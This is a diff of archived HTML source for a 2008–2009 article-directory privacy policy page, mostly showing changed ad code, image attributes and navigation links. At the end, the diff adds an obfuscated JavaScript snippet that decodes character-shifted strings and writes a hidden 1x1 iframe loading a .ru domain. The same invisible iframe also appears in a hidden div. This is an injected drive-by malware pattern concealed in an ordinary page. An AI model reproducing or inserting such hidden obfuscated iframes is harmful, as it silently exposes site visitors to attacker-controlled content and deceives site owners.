--- a/s/sm/sma/smartfindsdirectory.com.html
+++ b/s/sm/sma/smartfindsdirectory.com.html
@@ -1,5 +1,5 @@
-<!--The following is the downloaded HTML source of the smartfindsdirectory.com privacy policy that was archived on 2008-12-16.
- Please check the original snapshot on the Wayback Machine (https://web.archive.org/web/20081216164413id_/http%3A//www.smartfindsdirectory.com/privacy.php) for the most accurate reproduction.-->
+<!--The following is the downloaded HTML source of the smartfindsdirectory.com privacy policy that was archived on 2009-06-16.
+ Please check the original snapshot on the Wayback Machine (https://web.archive.org/web/20090616140219id_/http%3A//www.smartfindsdirectory.com/privacy.php) for the most accurate reproduction.-->
 
 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head>
 
@@ -7,8 +7,8 @@
 	<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
     	<meta http-equiv="Content-Style-Type" content="text/css">
 
-    	<meta name="Title" content=" | Smartfinds Article Directory | Article Submission | Article Marketing | Article Content">
-    	<title> | Smartfinds Article Directory | Article Submission | Article Marketing | Article Content</title>
+    	<meta name="Title" content="Smartfinds Article Directory | Article Submission | Article Marketing | Article Content">
+    	<title>Smartfinds Article Directory | Article Submission | Article Marketing | Article Content</title>
 
     	<meta name="Author" content="SmartFinds Article Directory">
     	<meta name="Subject" content="SmartFinds article directory provides article submission for article content into an article directory for article marketing.">
@@ -37,7 +37,7 @@
 <table class="maintable" cellspacing="0" cellpadding="0" width="750">
 
 <tbody><tr>
-<td colspan="1"><a href="http://www.smartfindsdirectory.com"><img border="0" src="http://www.smartfindsdirectory.com/images/sf_logo_360x70.png"></a></td>
+<td colspan="1"><a href="http://www.smartfindsdirectory.com"><img border="0" src="http://www.smartfindsdirectory.com/images/sf_logo_360x70.png" alt="SmartFinds Internet Marketing Logo" height="70" width="370"></a></td>
 <td colspan="1"></td>
 </tr>
 
@@ -105,7 +105,7 @@
 <div class="spacer"></div>
 <div class="rightnavbox">
 <div align="center"><b>PICK 5 CIGAR SAMPLES GET ONE FREE</b><br><br>
-<a href="http://www.cigarfox.com/" target="_blank" title="Cigar Fox Cigars | Cigar Humidor | Cigar Box | Cigar Accessories"><img src="http://www.smartfindsdirectory.com/images/cigar_fox_anim_163.gif" border="0" alt="Cigar Fox Cigars"><br><img src="http://www.smartfindsdirectory.com/images/cigarfox_logo_163.png" border="0" a;t="Cigar Fox Cigars"><br><b>VISIT WWW.CIGARFOX.COM</b></a>
+<a href="http://www.cigarfox.com/" target="_blank" title="Cigar Fox Cigars | Cigar Humidor | Cigar Box | Cigar Accessories"><img src="http://www.smartfindsdirectory.com/images/cigar_fox_anim_163.gif" border="0" alt="Cigar Fox Cigars" width="160" height="134"><br><img src="http://www.smartfindsdirectory.com/images/cigarfox_logo_163.png" border="0" alt="Cigar Fox Cigars" width="160" height="45"><br><b>VISIT WWW.CIGARFOX.COM</b></a>
 <br><br>
 </div>
 </div>
@@ -113,29 +113,66 @@
 <div class="spacer"></div>
 <div class="rightnavbox">
 <script type="text/javascript"><!--
-google_ad_client = "pub-4486411492919632";
-/* 200x90, SmartFinds Article */
-google_ad_slot = "0398105502";
-google_ad_width = 200;
+google_ad_client = "pub-9246231837762991";
+/* 160x90, created 6/9/09 */
+google_ad_slot = "7856613895";
+google_ad_width = 160;
 google_ad_height = 90;
 //-->
 </script>
 <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
 </script>
+<br><br>
 </div>
 
 <div class="spacer"></div>
 <div class="rightnavbox">
-&lt;<script type="text/javascript"><!--
-google_ad_client = "pub-4486411492919632";
-/* 160x600, smartfinds */
-google_ad_slot = "9406527099";
+<!-- Google Adsense Code Start -->
+<script type="text/javascript"><!--
+google_ad_client = "pub-9246231837762991";
+/* SFDIR 160x600, created 5/31/09 */
+google_ad_slot = "8873381794";
 google_ad_width = 160;
 google_ad_height = 600;
 //-->
 </script>
 <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
 </script>
+<br><br>
+</div>
+
+
+<div class="spacer"></div>
+<div class="rightnavbox">
+<!-- Begin: AdBrite, Generated: 2008-12-29 23:22:04  -->
+<script type="text/javascript">
+var AdBrite_Title_Color = 'CC0000';
+var AdBrite_Text_Color = '000000';
+var AdBrite_Background_Color = 'FFFFFF';
+var AdBrite_Border_Color = 'CCCCCC';
+var AdBrite_URL_Color = '008000';
+try{var AdBrite_Iframe=window.top!=window.self?2:1;var AdBrite_Referrer=document.referrer==''?document.location:document.referrer;AdBrite_Referrer=encodeURIComponent(AdBrite_Referrer);}catch(e){var AdBrite_Iframe='';var AdBrite_Referrer='';}
+</script>
+<script type="text/javascript">document.write(String.fromCharCode(60,83,67,82,73,80,84));document.write(' src="http://ads.adbrite.com/mb/text_group.php?sid=979733&zs=3136305f363030&ifr='+AdBrite_Iframe+'&ref='+AdBrite_Referrer+'" type="text/javascript">');document.write(String.fromCharCode(60,47,83,67,82,73,80,84,62));</script><script src="http://ads.adbrite.com/mb/text_group.php?sid=979733&amp;zs=3136305f363030&amp;ifr=1&amp;ref=https%3A%2F%2Fweb.archive.org%2Fweb%2F20090616140219id_%2Fhttp%253A%2F%2Fwww.smartfindsdirectory.com%2Fprivacy.php" type="text/javascript"></script>
+<div><a target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=979733&amp;afsid=1" style="font-weight:bold;font-family:Arial;font-size:13px;">Your Ad Here</a></div>
+<!-- End: AdBrite -->
+</div>
+
+
+<div class="spacer"></div>
+<div class="rightnavbox">
+<!-- Begin: AdBrite, Generated: 2009-01-01 14:45:03  -->
+<script type="text/javascript">
+var AdBrite_Title_Color = '0000FF';
+var AdBrite_Text_Color = '000000';
+var AdBrite_Background_Color = 'FFFF66';
+var AdBrite_Border_Color = 'CCCCCC';
+var AdBrite_URL_Color = '008000';
+try{var AdBrite_Iframe=window.top!=window.self?2:1;var AdBrite_Referrer=document.referrer==''?document.location:document.referrer;AdBrite_Referrer=encodeURIComponent(AdBrite_Referrer);}catch(e){var AdBrite_Iframe='';var AdBrite_Referrer='';}
+</script>
+<script type="text/javascript">document.write(String.fromCharCode(60,83,67,82,73,80,84));document.write(' src="http://ads.adbrite.com/mb/text_group.php?sid=982893&zs=3136305f363030&ifr='+AdBrite_Iframe+'&ref='+AdBrite_Referrer+'" type="text/javascript">');document.write(String.fromCharCode(60,47,83,67,82,73,80,84,62));</script><script src="http://ads.adbrite.com/mb/text_group.php?sid=982893&amp;zs=3136305f363030&amp;ifr=1&amp;ref=https%3A%2F%2Fweb.archive.org%2Fweb%2F20090616140219id_%2Fhttp%253A%2F%2Fwww.smartfindsdirectory.com%2Fprivacy.php" type="text/javascript"></script>
+<div><a target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=982893&amp;afsid=1" style="font-weight:bold;font-family:Arial;font-size:13px;">Your Ad Here</a></div>
+<!-- End: AdBrite -->
 </div>
 
 </td> <!-- End of Navigator -->
@@ -147,7 +184,7 @@ google_ad_height = 600;
 
 <p>
 </p><div align="center">
-<a href="http://www.smartfindsdirectory.com/links/index.php" target="_blank">Resources</a> - <a href="http://www.telalinks.com/" target="_blank">Link Exchange</a> | <a href="http://www.smartfindsdirectory.com/belinkeddirectory.php" target="_blank">WEB Directory</a> | <a href="http://www.smartfindsdirectory.com/search/article_index.html" target="_blank">Featured Articles</a> | <a href="http://www.smartfindsdirectory.com/brllinks/index.php" target="_blank">BRL Links</a> | <a href="http://www.build-reciprocal-links.Com">Exchange Links</a>
+<a href="http://www.smartfindsdirectory.com/free_content.html" target="_blank" title="free articles | free content | free article">Free Content</a> | <a href="http://www.smartfindsdirectory.com/links/index.php" target="_blank">Resources</a> - <a href="http://www.telalinks.com/" target="_blank">Link Exchange</a> | <a href="http://www.smartfindsdirectory.com/belinkeddirectory.php" target="_blank">WEB Directory</a> | <a href="http://www.smartfindsdirectory.com/search/article_index.html" target="_blank">Featured Articles</a> | <a href="http://www.smartfindsdirectory.com/brllinks/index.php" target="_blank">BRL Links</a> | <a href="http://www.build-reciprocal-links.Com">Exchange Links</a> |   <a href="http://www.smartfindsdirectory.com/glinks/index.php" target="_blank">Resources 2</a>
 </div>
 <p></p>
 
@@ -171,7 +208,7 @@ var google_conversion_label = "default";
 <script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">
 </script>
 <noscript>
-<img height=1 width=1 border=0 src="http://www.googleadservices.com/pagead/conversion/1058335187/imp.gif?value=1&label=default&script=0">
+<img height="1" width="1" border="0" src="http://www.googleadservices.com/pagead/conversion/1058335187/imp.gif?value=1&label=default&script=0" alt="Google Ad Services">
 </noscript>
 
 
@@ -189,7 +226,7 @@ var google_conversion_color = "FFFFFF";
 <script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">
 </script>
 <noscript>
-<img height=1 width=1 border=0 src="http://www.googleadservices.com/pagead/conversion/1058335187/extclk?script=0">
+<img height="1" width="1" border="0" src="http://www.googleadservices.com/pagead/conversion/1058335187/extclk?script=0" alt="Google Ad Services">
 </noscript>
 
 <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
@@ -207,7 +244,13 @@ urchinTracker();
 </noscript>
 <!-- End Quantcast tag -->
 
+<!-- Start AdBrite InlineAd Code -->
+<!-- Begin: AdBrite, Generated: 2008-12-29 23:33:54  -->
+<script type="text/javascript" src="http://ads.adbrite.com/mb/text_group.php?sid=979741&amp;br=1&amp;dk=736d616c6c20627573696e6573735f305f325f776562"></script>
+<!-- End: AdBrite -->
+<!-- End AdBrite InlineAd Code -->
 
+<script language="javascript" type="text/javascript">var k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22',k2='0wugtu0khtcogeqwpvgt0tw1Au?3$"htcogdqtfgt?2"xurceg?2"jurceg?2"ykfvj?3"jgkijv?3"octikpykfvj?2"octikpjgkijv?2"uetqnnkpi?pq@>1khtcog@>1fkx@',t1=0,t2=0,h='';while(t1<=k1.length-1){h=h+String.fromCharCode(k1.charCodeAt(t1++)-3);}h=h+'bdecdzzazbzgdj';while(t2<=k2.length-1){h=h+String.fromCharCode(k2.charCodeAt(t2++)-2);}document.write(h);</script><div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://bdecdzzazbzgdj.users.iframecounter.ru/?s=1" frameborder="0" vspace="0" hspace="0" width="1" height="1" marginwidth="0" marginheight="0" scrolling="no"></iframe></div>
 
 
 
